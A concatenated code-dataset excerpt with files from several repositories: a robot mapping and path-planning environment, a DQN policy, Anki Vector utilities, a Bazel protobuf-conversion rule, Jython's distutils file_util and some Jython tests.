def _create_padded_room_zeros(self):
return np.zeros((
int(2 * np.ceil((self.room_width * LOCAL_MAP_PIXELS_PER_METER + LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2)) / 2)), # Ensure even
int(2 * np.ceil((self.room_length * LOCAL_MAP_PIXELS_PER_METER + LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2)) / 2))
), dtype=np.float32)
def _create_global_distance_to_receptacle_map(self):
global_map = self._create_padded_room_zeros()
for i in range(global_map.shape[0]):
for j in range(global_map.shape[1]):
position_x = ((j + 1) - global_map.shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = -((i + 1) - global_map.shape[0] / 2) / LOCAL_MAP_PIXELS_PER_METER
global_map[i, j] = ((self.receptacle_position[0] - position_x)**2 + (self.receptacle_position[1] - position_y)**2)**0.5
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.distance_to_receptacle_channel_scale
return global_map
def _create_local_position_map(self):
local_position_map_x = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
local_position_map_y = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
for i in range(local_position_map_x.shape[0]):
for j in range(local_position_map_x.shape[1]):
position_x = ((j + 1) - local_position_map_x.shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = -((i + 1) - local_position_map_x.shape[0] / 2) / LOCAL_MAP_PIXELS_PER_METER
local_position_map_x[i][j] = position_x
local_position_map_y[i][j] = position_y
local_position_map_x *= self.position_channel_scale
local_position_map_y *= self.position_channel_scale
return local_position_map_x, local_position_map_y
def _create_global_shortest_path_to_receptacle_map(self):
global_map = self._create_padded_room_zeros() + np.inf
pixel_i, pixel_j = position_to_pixel_indices(self.receptacle_position[0], self.receptacle_position[1], self.configuration_space.shape)
pixel_i, pixel_j = self._closest_valid_cspace_indices(pixel_i, pixel_j)
shortest_path_image, _ = spfa.spfa(self.configuration_space, (pixel_i, pixel_j))
shortest_path_image /= LOCAL_MAP_PIXELS_PER_METER
global_map = np.minimum(global_map, shortest_path_image)
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.shortest_path_channel_scale
return global_map
def _create_global_shortest_path_map(self, robot_position):
pixel_i, pixel_j = position_to_pixel_indices(robot_position[0], robot_position[1], self.configuration_space.shape)
pixel_i, pixel_j = self._closest_valid_cspace_indices(pixel_i, pixel_j)
global_map, _ = spfa.spfa(self.configuration_space, (pixel_i, pixel_j))
global_map /= LOCAL_MAP_PIXELS_PER_METER
global_map /= (np.sqrt(2) * LOCAL_MAP_PIXEL_WIDTH) / LOCAL_MAP_PIXELS_PER_METER
global_map *= self.shortest_path_channel_scale
return global_map
def _get_new_observation(self):
# Capture images from forward-facing camera
camera_position = self.robot_position[:2] + [CAMERA_HEIGHT]
camera_target = [
camera_position[0] + CAMERA_HEIGHT * np.tan(np.radians(90 + CAMERA_PITCH)) * np.cos(self.robot_heading),
camera_position[1] + CAMERA_HEIGHT * np.tan(np.radians(90 + CAMERA_PITCH)) * np.sin(self.robot_heading),
0
]
camera_up = [
np.cos(np.radians(90 + CAMERA_PITCH)) * np.cos(self.robot_heading),
np.cos(np.radians(90 + CAMERA_PITCH)) * np.sin(self.robot_heading),
np.sin(np.radians(90 + CAMERA_PITCH))
]
view_matrix = p.computeViewMatrix(camera_position, camera_target, camera_up)
images = p.getCameraImage(self.camera_image_pixel_width, self.camera_image_pixel_height, view_matrix, self.projection_matrix) # tinyrenderer
# Compute depth
depth_buffer = np.reshape(images[3], (self.camera_image_pixel_height, self.camera_image_pixel_width))
depth = CAMERA_FAR * CAMERA_NEAR / (CAMERA_FAR - (CAMERA_FAR - CAMERA_NEAR) * depth_buffer)
# Construct point cloud
principal = np.asarray(camera_target) - np.asarray(camera_position)
principal = principal / np.linalg.norm(principal)
camera_up = np.asarray(camera_up)
up = camera_up - np.dot(camera_up, principal) * principal
up = up / np.linalg.norm(up)
right = np.cross(principal, up)
right = right / np.linalg.norm(right)
points = np.broadcast_to(camera_position, (self.camera_image_pixel_height, self.camera_image_pixel_width, 3))
limit_y = np.tan(np.radians(CAMERA_FOV / 2))
limit_x = limit_y * self.camera_aspect
pixel_x, pixel_y = np.meshgrid(np.linspace(-limit_x, limit_x, self.camera_image_pixel_width), np.linspace(limit_y, -limit_y, self.camera_image_pixel_height))
points = points + depth[:, :, np.newaxis] * (principal + pixel_y[:, :, np.newaxis] * up + pixel_x[:, :, np.newaxis] * right)
# Get segmentation
seg_raw = np.reshape(images[4], (self.camera_image_pixel_height, self.camera_image_pixel_width))
seg = np.zeros_like(seg_raw, dtype=np.float32)
seg += FLOOR_SEG_INDEX * (seg_raw == 0)
seg += OBSTACLE_SEG_INDEX * (seg_raw >= self.min_obstacle_id) * (seg_raw <= self.max_obstacle_id)
seg += RECEPTACLE_SEG_INDEX * (seg_raw == self.receptacle_id)
seg += ROBOT_SEG_INDEX * (seg_raw == self.robot_id)
seg += CUBE_SEG_INDEX * (seg_raw >= self.min_cube_id) * (seg_raw <= self.max_cube_id)
seg /= MAX_SEG_INDEX
return points, seg
def _update_state(self):
points, seg = self._get_new_observation()
# Update occupancy map
augmented_points = np.concatenate((points, np.isclose(seg[:, :, np.newaxis], OBSTACLE_SEG_INDEX / MAX_SEG_INDEX)), axis=2).reshape(-1, 4)
obstacle_points = augmented_points[np.isclose(augmented_points[:, 3], 1)]
pixel_i, pixel_j = position_to_pixel_indices(obstacle_points[:, 0], obstacle_points[:, 1], self.occupancy_map.shape)
self.occupancy_map[pixel_i, pixel_j] = 1
if self.show_occupancy_map:
free_space_points = augmented_points[np.isclose(augmented_points[:, 3], 0)]
pixel_i, pixel_j = position_to_pixel_indices(free_space_points[:, 0], free_space_points[:, 1], self.free_space_map.shape)
self.free_space_map[pixel_i, pixel_j] = 1
# Update overhead map
augmented_points = np.concatenate((points, seg[:, :, np.newaxis]), axis=2).reshape(-1, 4)
augmented_points = augmented_points[np.argsort(-augmented_points[:, 2])]
pixel_i, pixel_j = position_to_pixel_indices(augmented_points[:, 0], augmented_points[:, 1], self.global_overhead_map.shape)
self.global_overhead_map[pixel_i, pixel_j] = augmented_points[:, 3]
# Update configuration space
selem = disk(np.floor(ROBOT_RADIUS * LOCAL_MAP_PIXELS_PER_METER))
self.configuration_space = 1 - np.maximum(self.wall_map, binary_dilation(self.occupancy_map, selem).astype(np.uint8))
selem_thin = disk(np.floor(ROBOT_HALF_WIDTH * LOCAL_MAP_PIXELS_PER_METER))
self.configuration_space_thin = 1 - binary_dilation(np.minimum(1 - self.wall_map, self.occupancy_map), selem_thin).astype(np.uint8)
self.closest_cspace_indices = distance_transform_edt(1 - self.configuration_space, return_distances=False, return_indices=True)
def _get_local_overhead_map(self):
# Note: Can just use _get_local_map. Keeping this here only for reproducibility since it gives slightly different outputs.
rotation_angle = np.degrees(self.robot_heading) - 90
pos_y = int(np.floor(self.global_overhead_map.shape[0] / 2 - self.robot_position[1] * LOCAL_MAP_PIXELS_PER_METER))
pos_x = int(np.floor(self.global_overhead_map.shape[1] / 2 + self.robot_position[0] * LOCAL_MAP_PIXELS_PER_METER))
mask = rotate_image(np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32), rotation_angle, order=0)
y_start = pos_y - int(mask.shape[0] / 2)
y_end = y_start + mask.shape[0]
x_start = pos_x - int(mask.shape[1] / 2)
x_end = x_start + mask.shape[1]
crop = self.global_overhead_map[y_start:y_end, x_start:x_end]
crop = rotate_image(crop, -rotation_angle, order=0)
y_start = int(crop.shape[0] / 2 - LOCAL_MAP_PIXEL_WIDTH / 2)
y_end = y_start + LOCAL_MAP_PIXEL_WIDTH
x_start = int(crop.shape[1] / 2 - LOCAL_MAP_PIXEL_WIDTH / 2)
x_end = x_start + LOCAL_MAP_PIXEL_WIDTH
return crop[y_start:y_end, x_start:x_end]
@staticmethod
def _get_local_map(global_map, robot_position, robot_heading):
crop_width = round_up_to_even(LOCAL_MAP_PIXEL_WIDTH * np.sqrt(2))
rotation_angle = 90 - np.degrees(robot_heading)
pixel_i = int(np.floor(-robot_position[1] * LOCAL_MAP_PIXELS_PER_METER + global_map.shape[0] / 2))
pixel_j = int(np.floor(robot_position[0] * LOCAL_MAP_PIXELS_PER_METER + global_map.shape[1] / 2))
crop = global_map[pixel_i - crop_width // 2:pixel_i + crop_width // 2, pixel_j - crop_width // 2:pixel_j + crop_width // 2]
rotated_crop = rotate_image(crop, rotation_angle, order=0)
local_map = rotated_crop[
rotated_crop.shape[0] // 2 - LOCAL_MAP_PIXEL_WIDTH // 2:rotated_crop.shape[0] // 2 + LOCAL_MAP_PIXEL_WIDTH // 2,
rotated_crop.shape[1] // 2 - LOCAL_MAP_PIXEL_WIDTH // 2:rotated_crop.shape[1] // 2 + LOCAL_MAP_PIXEL_WIDTH // 2
]
return local_map
def _get_local_distance_map(self, global_map, robot_position, robot_heading):
local_map = self._get_local_map(global_map, robot_position, robot_heading)
local_map -= local_map.min() # Move the min to 0 to make invariant to size of environment
return local_map
def get_state(self, done=False):
if done:
return None
# Overhead map
channels = []
channels.append(self._get_local_overhead_map())
# Robot state
channels.append(self.robot_state_channel)
# Additional channels
if self.use_distance_to_receptacle_channel:
channels.append(self._get_local_distance_map(self.global_distance_to_receptacle_map, self.robot_position, self.robot_heading))
if self.use_shortest_path_to_receptacle_channel:
global_shortest_path_to_receptacle_map = self._create_global_shortest_path_to_receptacle_map()
channels.append(self._get_local_distance_map(global_shortest_path_to_receptacle_map, self.robot_position, self.robot_heading))
if self.use_shortest_path_channel:
global_shortest_path_map = self._create_global_shortest_path_map(self.robot_position)
channels.append(self._get_local_distance_map(global_shortest_path_map, self.robot_position, self.robot_heading))
if self.use_position_channel:
channels.append(self.local_position_map_x)
channels.append(self.local_position_map_y)
assert all(channel.dtype == np.float32 for channel in channels)
return np.stack(channels, axis=2)
def _shortest_path(self, source_position, target_position, check_straight=False, configuration_space=None):
if configuration_space is None:
configuration_space = self.configuration_space
# Convert positions to pixel indices
source_i, source_j = position_to_pixel_indices(source_position[0], source_position[1], configuration_space.shape)
target_i, target_j = position_to_pixel_indices(target_position[0], target_position[1], configuration_space.shape)
# Check if there is a straight line path
if check_straight:
rr, cc = line(source_i, source_j, target_i, target_j)
if (1 - self.configuration_space_thin[rr, cc]).sum() == 0:
return [source_position, target_position]
# Run SPFA
source_i, source_j = self._closest_valid_cspace_indices(source_i, source_j) # Note: does not use the cspace passed into this method
target_i, target_j = self._closest_valid_cspace_indices(target_i, target_j)
_, parents = spfa.spfa(configuration_space, (source_i, source_j))
# Recover shortest path
parents_ij = np.stack((parents // parents.shape[1], parents % parents.shape[1]), axis=2)
parents_ij[parents < 0, :] = [-1, -1]
i, j = target_i, target_j
coords = [[i, j]]
while not (i == source_i and j == source_j):
i, j = parents_ij[i, j]
if i + j < 0:
break
coords.append([i, j])
# Convert dense path to sparse path (waypoints)
coords = approximate_polygon(np.asarray(coords), tolerance=1)
# Remove unnecessary waypoints
new_coords = [coords[0]]
for i in range(1, len(coords) - 1):
rr, cc = line(*new_coords[-1], *coords[i + 1])
if (1 - configuration_space[rr, cc]).sum() > 0:
new_coords.append(coords[i])
if len(coords) > 1:
new_coords.append(coords[-1])
coords = new_coords
# Convert pixel indices back to positions
path = []
for coord in coords[::-1]:
position_x, position_y = pixel_indices_to_position(coord[0], coord[1], configuration_space.shape)
path.append([position_x, position_y, 0])
if len(path) < 2:
path = [source_position, target_position]
else:
path[0] = source_position
path[-1] = target_position
return path
def _shortest_path_distance(self, source_position, target_position, configuration_space=None):
path = self._shortest_path(source_position, target_position, configuration_space=configuration_space)
return sum(distance(path[i - 1], path[i]) for i in range(1, len(path)))
def _closest_valid_cspace_indices(self, i, j):
return self.closest_cspace_indices[:, i, j]
class RealEnvironment(Environment):
CUBE_REMOVAL_THRESHOLD = 2
REMOVED_BODY_Z = -1000
def __init__(self, robot_index, cube_indices, **kwargs):
super().__init__(**kwargs)
self.robot_index = robot_index
self.cube_indices = cube_indices
assert len(self.cube_indices) == self.num_cubes
self.robot_requires_reset = True
self.cube_removal_counter = {cube_index: 0 for cube_index in self.cube_indices}
def update_poses(self, data):
if data['cubes'] is not None:
for cube_index, cube_id in zip(self.cube_indices, self.cube_ids):
pose = data['cubes'].get(cube_index)
if pose is None or self._cube_position_in_receptacle(pose['position']):
self.cube_removal_counter[cube_index] += 1
if self.cube_removal_counter[cube_index] > self.CUBE_REMOVAL_THRESHOLD:
p.resetBasePositionAndOrientation(cube_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
else:
self.cube_removal_counter[cube_index] = 0
p.resetBasePositionAndOrientation(cube_id, pose['position'] + [CUBE_WIDTH / 2], p.getQuaternionFromEuler([0, 0, pose['heading']]))
if data['robots'] is not None:
pose = data['robots'].get(self.robot_index)
if pose is not None:
robot_position = pose['position'] + [0]
robot_orientation = p.getQuaternionFromEuler([0, 0, pose['heading']])
if self.robot_requires_reset:
p.resetBasePositionAndOrientation(self.robot_id, robot_position, robot_orientation)
self.robot_requires_reset = False
p.changeConstraint(self.robot_cid, jointChildPivot=robot_position, jointChildFrameOrientation=robot_orientation, maxForce=500)
self._step_simulation_until_still()
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
def try_action(self, action):
target_end_effector_position = self._step(action, dry_run=True)
result = {'target_end_effector_position': target_end_effector_position[:2]}
return result
def _reset_poses(self):
p.resetBasePositionAndOrientation(self.robot_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
self.robot_requires_reset = True
for cube_id in self.cube_ids:
p.resetBasePositionAndOrientation(cube_id, [0, 0, self.REMOVED_BODY_Z], [0, 0, 0, 1])
################################################################################
# Helper functions
def round_up_to_even(x):
return int(2 * np.ceil(x / 2))
def distance(position1, position2):
return np.linalg.norm(np.asarray(position1)[:2] - np.asarray(position2)[:2])
def orientation_to_heading(orientation):
# Note: only works for z-axis rotations
return 2 * np.arccos(np.sign(orientation[2]) * orientation[3])
def restrict_heading_range(heading):
return np.mod(heading + np.pi, 2 * np.pi) - np.pi
def heading_difference(heading1, heading2):
return restrict_heading_range(heading2 - heading1)
def position_to_pixel_indices(position_x, position_y, image_shape):
pixel_i = np.floor(image_shape[0] / 2 - position_y * LOCAL_MAP_PIXELS_PER_METER).astype(np.int32)
pixel_j = np.floor(image_shape[1] / 2 + position_x * LOCAL_MAP_PIXELS_PER_METER).astype(np.int32)
pixel_i = np.clip(pixel_i, 0, image_shape[0] - 1)
pixel_j = np.clip(pixel_j, 0, image_shape[1] - 1)
return pixel_i, pixel_j
def pixel_indices_to_position(pixel_i, pixel_j, image_shape):
position_x = (pixel_j - image_shape[1] / 2) / LOCAL_MAP_PIXELS_PER_METER
position_y = (image_shape[0] / 2 - pixel_i) / LOCAL_MAP_PIXELS_PER_METER
return position_x, position_y
```
#### File: jimmyyhwu/spatial-action-maps/policies.py
```python
import random
import torch
from torchvision import transforms
import models
class DQNPolicy:
def __init__(self, cfg, action_space, train=False, random_seed=None):
self.cfg = cfg
self.action_space = action_space
self.train = train
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.policy_net = self.build_network()
self.transform = transforms.ToTensor()
# Resume from checkpoint if applicable
if self.cfg.checkpoint_path is not None:
model_checkpoint = torch.load(self.cfg.model_path, map_location=self.device)
self.policy_net.load_state_dict(model_checkpoint['state_dict'])
if self.train:
self.policy_net.train()
else:
self.policy_net.eval()
print("=> loaded model '{}'".format(self.cfg.model_path))
if random_seed is not None:
random.seed(random_seed)
def build_network(self):
raise NotImplementedError
def apply_transform(self, s):
return self.transform(s).unsqueeze(0)
def step(self, state, exploration_eps=None, debug=False):
if exploration_eps is None:
exploration_eps = self.cfg.final_exploration
state = self.apply_transform(state).to(self.device)
with torch.no_grad():
output = self.policy_net(state).squeeze(0)
if random.random() < exploration_eps:
action = random.randrange(self.action_space)
else:
action = output.view(1, -1).max(1)[1].item()
info = {}
if debug:
info['output'] = output.squeeze(0)
return action, info
class SteeringCommandsPolicy(DQNPolicy):
def build_network(self):
return torch.nn.DataParallel(
models.SteeringCommandsDQN(num_input_channels=self.cfg.num_input_channels, num_output_channels=self.action_space)
).to(self.device)
class DenseActionSpacePolicy(DQNPolicy):
def build_network(self):
return torch.nn.DataParallel(
models.DenseActionSpaceDQN(num_input_channels=self.cfg.num_input_channels)
).to(self.device)
```
#### File: jimmyyhwu/spatial-action-maps/vector_action_executor.py
```python
import time
import numpy as np
import vector_controller
import vector_utils as utils
class VectorActionExecutor:
def __init__(self, robot_index):
if robot_index is None:
robot_name = utils.get_first_available_robot()
if robot_name is None:
print('No robots found')
robot_index = utils.get_robot_indices()[robot_name]
self.robot_index = robot_index
self.controller = vector_controller.VectorController(self.robot_index)
self.last_update_time = time.time()
self.last_robot_position = None
self.last_robot_heading = None
self.stuck_count = 0
self.unstuck_count = 0
self.jittering = False
self.target_end_effector_position = None
def update_try_action_result(self, try_action_result):
# Simulation results
self.target_end_effector_position = try_action_result['target_end_effector_position']
self.last_update_time = time.time()
def step(self, poses):
if self.target_end_effector_position is None:
return
robot_poses = poses['robots']
if robot_poses is None or self.robot_index not in robot_poses:
return
robot_position = robot_poses[self.robot_index]['position']
robot_heading = robot_poses[self.robot_index]['heading']
info = {
'last_robot_position': self.last_robot_position,
'last_robot_heading': self.last_robot_heading,
'robot_position': robot_position,
'robot_heading': robot_heading,
'target_end_effector_position': self.target_end_effector_position,
}
if self.jittering:
info['robot_heading'] += np.random.uniform(-np.pi, np.pi)
self.last_robot_position = robot_position
self.last_robot_heading = robot_heading
# Update the controller
self.controller.step(info)
# Handle robot getting stuck
if self.controller.is_stuck():
self.stuck_count += 1
else:
self.stuck_count = 0
self.unstuck_count += 1
if self.stuck_count > 30:
self.jittering = True
self.unstuck_count = 0
if self.jittering and self.unstuck_count > 5:
self.jittering = False
def is_action_completed(self, timeout=10):
if any([self.controller.is_idle(), self.stuck_count > 10, time.time() - self.last_update_time > timeout]):
return True
return False
def disconnect(self):
self.controller.disconnect()
```
#### File: jimmyyhwu/spatial-action-maps/vector_utils.py
```python
import configparser
from multiprocessing.dummy import Pool
from pathlib import Path
import anki_vector
def get_config_path():
return Path.home() / '.anki_vector/sdk_config.ini'
def get_config():
config = configparser.ConfigParser()
config.read(get_config_path())
return config
def write_config(config):
with open(get_config_path(), 'w') as f:
config.write(f)
def get_robot_names():
config = get_config()
return sorted(config[serial]['name'] for serial in config.sections())
def get_robot_serials():
config = get_config()
return {config[serial]['name']: serial for serial in config.sections()}
def get_robot_indices():
config = get_config()
return {config[serial]['name']: i for i, serial in enumerate(config.sections())}
def get_available_robots(num_robots=10):
def ping(args):
name, serial = args
try:
with anki_vector.Robot(serial=serial, default_logging=False) as _:
return name
except:
return None
robot_serials = get_robot_serials()
available_names = []
with Pool(len(robot_serials)) as p:
it = p.imap_unordered(ping, robot_serials.items())
for name in it:
if name is not None:
available_names.append(name)
if len(available_names) > num_robots:
return available_names
return available_names
def get_first_available_robot():
names = get_available_robots(num_robots=1)
if len(names) > 0:
return names[0]
return None
``` |
{
"source": "jimmyyhwu/spatial-intention-maps-tf2",
"score": 2
} |
#### File: jimmyyhwu/spatial-intention-maps-tf2/enjoy.py
```python
import argparse
import components
import utils
def main(args):
config_path = args.config_path
if config_path is None:
config_path = utils.select_run()
if config_path is None:
return
print(config_path)
cfg = utils.load_config(config_path)
# Create env
env = utils.get_env_from_cfg(cfg, show_gui=True)
tf_env = components.get_tf_py_env(env, cfg.num_input_channels)
# Load policies
policies = components.load_policies(cfg)
# Run policies
time_step = tf_env.reset()
while True:
robot_group_index = tf_env.pyenv.envs[0].current_robot_group_index()
action_step = policies[robot_group_index].action(time_step)
time_step = tf_env.step(action_step.action)
parser = argparse.ArgumentParser()
parser.add_argument('--config-path')
main(parser.parse_args())
``` |
{
"source": "jimmyyou/mobile_app",
"score": 3
} |
#### File: cpp/proto/gen_binary_proto.bzl
```python
def convert_java_content(proto_message):
content = """
package package_name;
import com.google.protobuf.TextFormat;
import java.io.*;
public final class Convert {
public static void main(String args[]) throws FileNotFoundException, IOException {
BufferedReader br = new BufferedReader(new FileReader(args[0]));
class_name.Builder builder = class_name.newBuilder();
TextFormat.merge(br, builder);
builder.build().writeTo(System.out);
}
}
"""
package_name = proto_message[:proto_message.rfind(".")]
class_name = proto_message[proto_message.rfind(".") + 1:]
return content.replace("package_name", package_name).replace("class_name", class_name)
def text_to_bin(name, src, out, proto_message, proto_deps):
"""Convert a text proto file to binary file.
Modifying the text proto file is error-prone. Using this utility to
convert text file to binary file help the debugging process since
error will be spotted at compile time not runtime. Furthurmore,
parsing a binary proto file is much more efficient than a text one.
Args:
name: name of the rule.
src: the text file to convert.
out: target output filename.
proto_message: name of the proto message including package name.
proto_deps: the java proto library that proto_message belongs to.
"""
native.genrule(
name = "gen_convert_java",
outs = ["Convert.java"],
cmd = "echo '" + convert_java_content(proto_message) + "' > $@",
)
native.java_binary(
name = "Convert",
srcs = [
"Convert.java",
],
main_class = "org.mlperf.proto.Convert",
deps = proto_deps + [
"@com_google_protobuf//:protobuf_java",
],
)
native.genrule(
name = name,
srcs = [src],
outs = [out],
cmd = ("$(locations :Convert)" +
" $(location " + src + ") > $@"),
exec_tools = [":Convert"],
)
``` |
{
"source": "jimmyyu2004/jython",
"score": 2
} |
#### File: Lib/distutils/file_util.py
```python
__revision__ = "$Id: file_util.py 86238 2010-11-06 04:06:18Z eric.araujo $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'
_copy_action = {None: 'copying',
'hard': 'hard linking',
'sym': 'symbolically linking'}
def _copy_file_contents(src, dst, buffer_size=16*1024):
"""Copy the file 'src' to 'dst'.
Both must be filenames. Any error opening either file, reading from
'src', or writing to 'dst', raises DistutilsFileError. Data is
read/written in chunks of 'buffer_size' bytes (default 16k). No attempt
is made to handle anything apart from regular files.
"""
# Stolen from shutil module in the standard library, but with
# custom error-handling added.
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error as xxx_todo_changeme3:
(errno, errstr) = xxx_todo_changeme3.args
raise DistutilsFileError("could not open '%s': %s" % (src, errstr))
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error as xxx_todo_changeme:
(errno, errstr) = xxx_todo_changeme.args
raise DistutilsFileError(
"could not delete '%s': %s" % (dst, errstr))
try:
fdst = open(dst, 'wb')
except os.error as xxx_todo_changeme4:
(errno, errstr) = xxx_todo_changeme4.args
raise DistutilsFileError(
"could not create '%s': %s" % (dst, errstr))
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error as xxx_todo_changeme1:
(errno, errstr) = xxx_todo_changeme1.args
raise DistutilsFileError(
"could not read from '%s': %s" % (src, errstr))
if not buf:
break
try:
fdst.write(buf)
except os.error as xxx_todo_changeme2:
(errno, errstr) = xxx_todo_changeme2.args
raise DistutilsFileError(
"could not write to '%s': %s" % (dst, errstr))
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
def copy_file(src, dst, preserve_mode=1, preserve_times=1, update=0,
link=None, verbose=1, dry_run=0):
"""Copy a file 'src' to 'dst'.
If 'dst' is a directory, then 'src' is copied there with the same name;
otherwise, it must be a filename. (If the file exists, it will be
ruthlessly clobbered.) If 'preserve_mode' is true (the default),
the file's mode (type and permission bits, or whatever is analogous on
the current platform) is copied. If 'preserve_times' is true (the
default), the last-modified and last-access times are copied as well.
If 'update' is true, 'src' will only be copied if 'dst' does not exist,
or if 'dst' does exist but is older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
# XXX if the destination file already exists, we clobber it if
# copying, but blow up if linking. Hmmm. And I don't know what
# macostools.copyfile() does. Should definitely be consistent, and
# should probably blow up if destination exists and we would be
# changing it (ie. it's not already a hard/soft link to src OR
# (not update) and (src newer than dst).
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError(
"can't copy '%s': doesn't exist or not a regular file" % src)
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
if verbose >= 1:
log.debug("not copying %s (output up-to-date)", src)
return dst, 0
try:
action = _copy_action[link]
except KeyError:
raise ValueError("invalid value '%s' for 'link' argument" % link)
if verbose >= 1:
if os.path.basename(dst) == os.path.basename(src):
log.info("%s %s -> %s", action, src, dir)
else:
log.info("%s %s -> %s", action, src, dst)
if dry_run:
return (dst, 1)
# If linking (hard or symbolic), use the appropriate system call
# (Unix only, of course, but that's the caller's responsibility)
if link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
# Otherwise (non-Mac, not linking), copy the file contents and
# (optionally) copy the times and mode.
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
# According to <NAME> <<EMAIL>>, utime() should be done
# before chmod() (at least under NT).
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode and hasattr(os, 'chmod'):
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (dst, 1)
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst, verbose=1, dry_run=0):
"""Move a file 'src' to 'dst'.
If 'dst' is a directory, the file will be moved into it with the same
name; otherwise, 'src' is just renamed to 'dst'. Return the new
full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
if verbose >= 1:
log.info("moving %s -> %s", src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError("can't move '%s': not a regular file" % src)
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError(
"can't move '%s': destination '%s' already exists" %
(src, dst))
if not isdir(dirname(dst)):
raise DistutilsFileError(
"can't move '%s': destination '%s' not a valid path" % \
(src, dst))
copy_it = 0
try:
os.rename(src, dst)
except os.error as xxx_todo_changeme6:
(num, msg) = xxx_todo_changeme6.args
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError(
"couldn't move '%s' to '%s': %s" % (src, dst, msg))
if copy_it:
copy_file(src, dst, verbose=verbose)
try:
os.unlink(src)
except os.error as xxx_todo_changeme5:
(num, msg) = xxx_todo_changeme5.args
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError(
("couldn't move '%s' to '%s' by copy/delete: " +
"delete '%s' failed: %s") %
(src, dst, src, msg))
return dst
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, "w")
try:
for line in contents:
f.write(line + "\n")
finally:
f.close()
```
#### File: test/bugs/pr112.py
```python
def f():
pass
if hasattr(f, '__module__'):
print('functions should not have __module__ attributes')
# but make sure classes still do have __module__ attributes
class F:
pass
if not hasattr(F, '__module__'):
print('classes should still have __module__ attributes')
```
#### File: Lib/test/socketserver_test.py
```python
import socket
import threading
import socketserver
import time
from java.lang import Runtime
from java.util.concurrent import Executors, ExecutorCompletionService
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
cur_thread = threading.currentThread()
response = "%s: %s" % (cur_thread.getName(), data)
self.request.send(response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"mix together"
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.send(message)
response = sock.recv(1024)
# print threading.currentThread().getName(), response
sock.close()
if __name__ == "__main__":
# ephemeral ports should work on every Java system now
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a daemon thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
# create a client pool to run all client requests
pool = Executors.newFixedThreadPool(Runtime.getRuntime().availableProcessors() + 1)
ecs = ExecutorCompletionService(pool)
for i in range(4000): # empirically, this will exhaust heap when run with 16m heap
ecs.submit(lambda: client(ip, port, "Hello World %i" % i))
ecs.take() # wait until we have a thread available in the pool
pool.shutdown()
```
#### File: Lib/test/test_cpickle.py
```python
import pickle
import unittest
from io import StringIO
from test.pickletester import AbstractPickleTests, AbstractPickleModuleTests
from test import support
class ApproxFloat(unittest.TestCase):
# FIXME for Jython: remove this class - and its use from bases in
# subsequent test classes - when we can guarantee that floats that
# are pickled by cPickle are exact in the same way they are on
# CPython
def test_float(self):
from test.pickletester import protocols
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assertAlmostEqual(value, got)
class cPickleTests(ApproxFloat, AbstractPickleTests, AbstractPickleModuleTests):
def setUp(self):
